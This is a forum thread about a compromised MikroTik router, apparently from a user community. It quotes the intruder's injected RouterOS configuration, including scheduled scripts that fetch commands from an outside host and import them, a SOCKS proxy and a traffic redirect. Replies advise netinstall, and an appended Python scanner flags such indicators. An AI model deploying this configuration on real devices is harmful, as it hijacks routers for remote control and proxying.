Can't upgrade MikroTik router because it was hacked

Hello guys,

My router was hacked, and now clients on the LAN can’t access some websites (only some, not all). After removing the configuration that was added by the hacker, I tried to upgrade the RouterOS version, but I can’t upgrade RouterOS via /system packages or by manually uploading the .npk file. How can I fix this issue without netinstall? The router is very far from my location.
This is the configuration that was made by the hacker:

/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp src-address-list=!Ok to-ports=8080
/ip proxy
set anonymous=yes enabled=yes
/ip proxy access
add action=deny
/ip socks
set port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system scheduler
add interval=3m name="DDNS Serv" on-event="/system script run iDDNS" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
/system script
add name=script4_ owner=user policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.167 port=2008 src-path=/mikrotik.php mode=http keep-result=no"
add name=iDDNS owner=user policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=":global mac [/interface ethernet get 1 mac-address]\r
\n:global port ([/ip service get winbox port]."".[/ip socks get port]."".[/ip proxy get port])\r
\n:global info ([/ip socks get enabled]."".[/ip proxy get enabled]."".[/interface pptp-server server get enabled])\r
\n:global cmd "/$mac/$port/$info/dns"\r
\n/tool fetch address=src-ip.com src-path=$cmd mode=http dst-path=dns;:delay 3s\r
\n/import dns;:delay 4s;/file remove dns"

Best Regards
Fitrah Ali Hudzaifah Sofyan

I have the same issue, did anyone find a solution other than netinstall?

The ONLY safe way is to netinstall. The exploit can install files outside of RouterOS, so your router remains compromised even after a config reset. You can still export your config and import it again after sanitizing it.

@Victoria168, none of the correct hints you gave can help after the malware has already squatted on the machine. So as things stand now, netinstall is the only way.

Although I’m not answering the starting question, my device was hacked too and I was forced to use netinstall.

So my questions are:
How did the intruder gain access in the first place?
What’s the use of this hack (remote control, packet sniffing, DDoS attacks, bitcoin mining)?
How can I check in a timely way whether my devices are secure or not? I discovered it when Winbox access was blocked.

Any tips?

There were a number of known bugs on versions up to and including 6.42. Some of these exploits could lead to low level system access, below what an administrator has access to.
Which version were you at?

Tips: follow the security blog and upgrade…

My understanding, sebastia, is that the bugs were exploitable if basic security practices were not followed.
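
On the question above of how to check a device: one way, as an added example that is not part of the original thread, is to scan the text of a RouterOS /export for the kinds of changes quoted in the first post (NAT redirect, enabled web proxy, changed SOCKS settings, scheduler entries and scripts that fetch and import files). The rule names and the sample export are constructed, the standard export layout (section header line, then add/set lines) is assumed, and a match is a prompt to investigate, not proof; a clean result says nothing about files outside the configuration.

```python
import re

# Heuristic indicators modelled on the configuration quoted in the first post.
# (label, export section, regex applied to each add/set line in that section)
RULES = [
    ("nat-redirect", "/ip firewall nat", r"action=redirect\b"),
    ("web-proxy-enabled", "/ip proxy", r"\benabled=yes\b"),
    ("socks-changed", "/ip socks", r"\b(?:enabled=yes|port=(?!1080\b)\d+)"),
    ("scheduler-runs-script", "/system scheduler", r"on-event=.*script run"),
    ("script-fetches-remote", "/system script", r"/tool fetch\b"),
    ("script-imports-file", "/system script", r"/import\b"),
]

def join_continuations(text):
    """Rejoin lines that a RouterOS export wrapped with a trailing backslash."""
    return re.sub(r"\\\r?\n[ \t]*", "", text)

def scan_export(text):
    """Return (label, line) pairs for export lines that match an indicator."""
    findings, section = [], None
    for line in join_continuations(text).splitlines():
        line = line.strip()
        if line.startswith("/"):          # section header such as "/ip socks"
            section = line
            continue
        for label, rule_section, pattern in RULES:
            if section == rule_section and re.search(pattern, line):
                findings.append((label, line))
    return findings

# Constructed sample export (documentation address, made-up names).
SAMPLE = r"""/ip firewall nat
add action=redirect chain=dstnat dst-port=80 protocol=tcp to-ports=8080
/ip proxy
set enabled=yes
/ip socks
set port=4153
/system scheduler
add interval=3m name=job on-event="/system script run job" start-time=startup
/system script
add name=job source="/tool fetch address=192.0.2.10 src-path=/x mode=http dst-path=\
    tmp;:delay 3s\r\
    \n/import tmp"
"""

if __name__ == "__main__":
    for label, line in scan_export(SAMPLE):
        print(f"{label}: {line[:100]}")
```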